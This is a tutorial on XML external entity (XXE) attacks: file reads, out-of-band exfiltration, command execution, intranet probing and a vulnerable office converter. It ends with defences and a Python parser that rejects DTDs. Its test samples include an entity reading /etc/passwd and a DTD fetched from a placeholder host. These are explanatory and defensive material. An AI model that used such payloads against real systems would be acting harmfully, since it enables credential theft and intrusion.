XML is a markup language used to tag electronic documents and give them structure. It can tag data and define data types, and it is a metalanguage that lets users define their own markup languages. An XML document consists of an XML declaration, an optional DTD (document type definition) and the document element.
A DTD (document type definition) defines the legal building blocks of an XML document. A DTD can be declared inline in the XML document or referenced externally.
Internal DTD declaration:
<!DOCTYPE root-element [element-declarations]>
Reference to an external DTD:
<!DOCTYPE root-element SYSTEM "filename">
or
<!DOCTYPE root-element PUBLIC "public_ID" "filename">
DTD entities are variables that define shortcuts for plain text or special characters; they can be declared internally or referenced externally.
Internal entity declaration:
<!ENTITY entity-name "entity value">
Reference to an external entity:
<!ENTITY entity-name SYSTEM "URI">
or
<!ENTITY entity-name PUBLIC "public_ID" "URI">
2. XML external entities
When references to external entities are allowed, an attacker who controls the XML can construct malicious content that leads to arbitrary file reads, system command execution, intranet port probing, attacks on intranet sites and other harm.
There are many ways to introduce an external entity, for example:
Mode 1 for introducing a malicious external entity:
XML content:
Mode 2 for introducing a malicious external entity:
XML content:
DTD file (evil.dtd) content:
Mode 3 for introducing a malicious external entity:
XML content:
DTD file (evil.dtd) content:
In addition, different programs support different protocols.
The figure above shows the protocols supported by default; other extension protocols, such as the ones PHP adds, may be supported as well.
The following examples illustrate the hazards of XXE; they are not the only ones.
XXE hazard 1: reading arbitrary files
In this case /etc/passwd is read. Some XML parsing libraries also support directory listing, so an attacker can list directories and read files to obtain account passwords and then attack further. For example, after reading tomcat-users.xml to obtain the account password, the attacker can log in to the Tomcat manager and deploy a webshell.
What if the data is not echoed back? Is there no problem then? Consider the following,
No: the data can be sent to a remote server instead,
The contents of the remote evil.dtd file are as follows:
After the XXE attack is triggered, the server sends the contents of the file to the attacker's site.
XXE hazard 2: executing system commands
In this case a system command is executed in a PHP environment with the expect extension installed. Other protocols may also allow system commands to be executed.
XXE hazard 3: probing intranet ports
In this case ports 80 and 81 of 192.168.1.1 are probed. From the returned "connection refused" it can be seen that port 81 is closed and port 80 is open.
XXE hazard 4: attacking intranet sites
In this case an intranet Struts 2 site is attacked to execute system commands remotely.
3. Client-side XXE case
Recently an office document conversion tool was found to have an XXE vulnerability (PS: thanks to the white-hat researchers who reported the vulnerability to the TSRC platform). One application scenario: a web program calls the office software to extract the content of office documents and provide an online preview. Because the software reads XML files and allows references to external entities while processing office documents, an XXE attack is triggered when a user uploads a malicious document and previews it. Details follow:
Create a new, normal document whose content is "hi TSRC",
After running it through the software, the document content is obtained in text format,
When malicious code (a reference to an external entity) is injected into the docx's XML file, an XXE attack can be carried out.
4. Defending against XXE attacks
Scheme 1: use the method provided by the development language to disable external entities
PHP:
libxml_disable_entity_loader(true);
Other languages:
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet
Scheme 2: filter the XML data submitted by users
Keywords: SYSTEM and PUBLIC.
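As an added example (not code from the original article or from TSRC), the following Python applies scheme 1 with the standard library's expat parser: every DOCTYPE or ENTITY declaration is refused before the real parse, which covers all three modes above without relying on a keyword filter. The sample documents and the host name dtd-host.invalid are constructed for the demonstration.

```python
# Hardened loader for user-controlled XML: an added example, not code from the
# original article or from TSRC. A first pass with a bare expat parser rejects
# any DOCTYPE or ENTITY declaration, so all three "modes" of introducing an
# external entity are refused before the document is parsed for real.
import xml.parsers.expat
from xml.etree import ElementTree as ET


class UnsafeXMLError(ValueError):
    """Untrusted XML carried a DOCTYPE or ENTITY declaration."""


def _reject_dtd(data: bytes) -> None:
    p = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires on "<!DOCTYPE" itself, before any SYSTEM/PUBLIC identifier is fetched.
        raise UnsafeXMLError(f"DOCTYPE <{name}> refused (SYSTEM={sysid!r}, PUBLIC={pubid!r})")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXMLError(f"entity declaration {name!r} refused")

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    p.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    p.Parse(data, True)  # handlers raise before any external fetch can happen


def load_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML from an untrusted source, refusing any DTD outright."""
    _reject_dtd(data)
    return ET.fromstring(data)


def is_safe_xml(data: bytes) -> bool:
    """True when the document carries no DTD (and therefore no external entity)."""
    try:
        _reject_dtd(data)
        return True
    except UnsafeXMLError:
        return False


# Constructed sample inputs modelled on the article's scenarios (not real captures).
BENIGN_DOC = b'<?xml version="1.0"?><document><body><p>hi TSRC</p></body></document>'
INLINE_ENTITY_DOC = (  # mode 1: entity declared in the internal subset
    b'<?xml version="1.0"?><!DOCTYPE document [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b'<document>&xxe;</document>')
EXTERNAL_DTD_DOC = (  # mode 2: DTD pulled from a remote host (placeholder hostname)
    b'<?xml version="1.0"?><!DOCTYPE document SYSTEM "http://dtd-host.invalid/evil.dtd">'
    b'<document>x</document>')

for label, doc in (("benign", BENIGN_DOC), ("mode 1", INLINE_ENTITY_DOC), ("mode 2", EXTERNAL_DTD_DOC)):
    print(label, "accepted" if is_safe_xml(doc) else "rejected")
```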
[Conclusion]
Whether in a web program or a desktop program, as long as user-controlled XML is processed, a very harmful XXE vulnerability may exist. Developers need to be careful when processing XML and must forbid references to external entities in user-controlled XML data.
The code and technical details in this article are provided for technical exchange only and must not be used for illegal purposes. Discussion is welcome; this was written in a hurry and has shortcomings, so please do not hesitate to criticise and correct it.